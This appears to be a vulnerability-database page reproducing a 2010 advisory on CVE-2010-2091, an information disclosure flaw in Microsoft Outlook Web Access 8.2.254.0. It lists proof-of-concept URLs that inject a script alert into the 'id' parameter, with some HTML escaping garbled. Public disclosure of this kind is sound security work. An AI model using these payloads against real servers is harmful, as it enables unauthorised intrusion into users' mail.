Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2010-2091

Publish Date: 24 May 2010

                							

                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

"Microsoft Outlook Web Access (OWA) version 8.2.254.0"

OS: Windows Server 2003

Internet Explorer 7

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

There is an information disclosure vulnerability in "Microsoft Outlook Web
Access (OWA) version 8.2.254.0".

The issue is with the id parameter.

Following are different exploitation techniques:

https://example.com/owa/?ae=Folder&amp;t=IPF.Note&amp;id=&lt;script&gt;alert("HHH")&lt;/script&lt;https://example.com/owa/?ae=Folder&amp;t=IPF.Note&amp;id=%3cscript%3ealert(%22HHH%22)%3c/script&gt;
&gt;

https://example.com/owa/?ae=Folder&amp;t=IPF.Note&amp;id=

https://example.com/owa/?ae=Folder&amp;t=IPF.Note&amp;id=A



Best Regards,
Praveen Darshanam,
Security Researcher,
INDIA

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure

Vulmon Search

About

Products

Connect